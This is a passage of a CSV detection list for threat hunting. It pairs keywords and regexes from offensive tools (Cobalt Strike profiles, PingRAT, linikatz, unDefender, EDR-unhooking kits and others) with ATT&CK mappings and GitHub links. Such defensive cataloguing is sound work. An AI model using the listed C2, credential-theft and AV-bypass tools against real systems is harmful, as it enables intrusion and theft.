T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's 
flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" 
"*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*",".{0,1000}UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT\-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*umutcamliyurt/PingRAT*",".{0,1000}umutcamliyurt\/PingRAT.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" 
"*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*",".{0,1000}UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgUGF0aA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgUGF0aA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBETEwgVVJJ*",".{0,1000}UmVmbGVjdGl2ZSBETEwgVVJJ.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*",".{0,1000}UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Un1k0d3r/SCShell*",".{0,1000}Un1k0d3r\/SCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*Unable to inject 64-bit shellcode from within 32-bit Powershell*",".{0,1000}Unable\sto\sinject\s64\-bit\sshellcode\sfrom\swithin\s32\-bit\sPowershell.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*uname=FUZZ&pass=FUZZ*",".{0,1000}uname\=FUZZ\&pass\=FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Unblock-File .\install.ps1*",".{0,1000}Unblock\-File\s\.\\install\.ps1.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*Unconstrained_Delegation_Systems.txt*",".{0,1000}Unconstrained_Delegation_Systems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Und3rf10w*",".{0,1000}Und3rf10w.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unDefender-master*",".{0,1000}unDefender\-master.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*undertheradar-main*",".{0,1000}undertheradar\-main.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*Unhandled Rubeus exception:*",".{0,1000}Unhandled\sRubeus\sexception\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*unhide-implant*",".{0,1000}unhide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*unhook kernel32*",".{0,1000}unhook\skernel32.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook wldp amsi*",".{0,1000}unhook\swldp\samsi.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook_ntdll(remote_process*",".{0,1000}unhook_ntdll\(remote_process.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*UnhookingKnownDlls.*",".{0,1000}UnhookingKnownDlls\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingNtdll_disk.*",".{0,1000}UnhookingNtdll_disk\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - 
T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UniByAv*",".{0,1000}UniByAv.{0,1000}","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that takes raw shellcode and generates executables that are Anti-Virus friendly. The obfuscation routine is purely written in assembly to remain pretty short and efficient. In a nutshell the application generates a 32-bit XOR key and brute-forces the key at run time then performs the decryption of the actual shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","N/A","N/A","N/A","N/A" "*unicorn.py *",".{0,1000}unicorn\.py\s.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*unicorn-master.zip*",".{0,1000}unicorn\-master\.zip.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Unit-259/DataBouncing*",".{0,1000}Unit\-259\/DataBouncing.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*unix/1.0 UPnP/1.1 masscan/*",".{0,1000}unix\/1\.0\sUPnP\/1\.1\smasscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*unix_cached_ad_hashes.rb*",".{0,1000}unix_cached_ad_hashes\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*unix_kerberos_tickets.rb*",".{0,1000}unix_kerberos_tickets\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*unixpickle*",".{0,1000}unixpickle.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*UnkL4b/BabyShark*",".{0,1000}UnkL4b\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*unknown mythic client configuration 
setting: *",".{0,1000}unknown\smythic\sclient\sconfiguration\ssetting\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*unkvolism/Fuck-Etw*",".{0,1000}unkvolism\/Fuck\-Etw.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*unlink -- tells the current rat to disconnect from a child rat given a local file or UNC path*",".{0,1000}unlink\s\-\-\stells\sthe\scurrent\srat\sto\sdisconnect\sfrom\sa\schild\srat\sgiven\sa\slocal\sfile\sor\sUNC\spath.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - 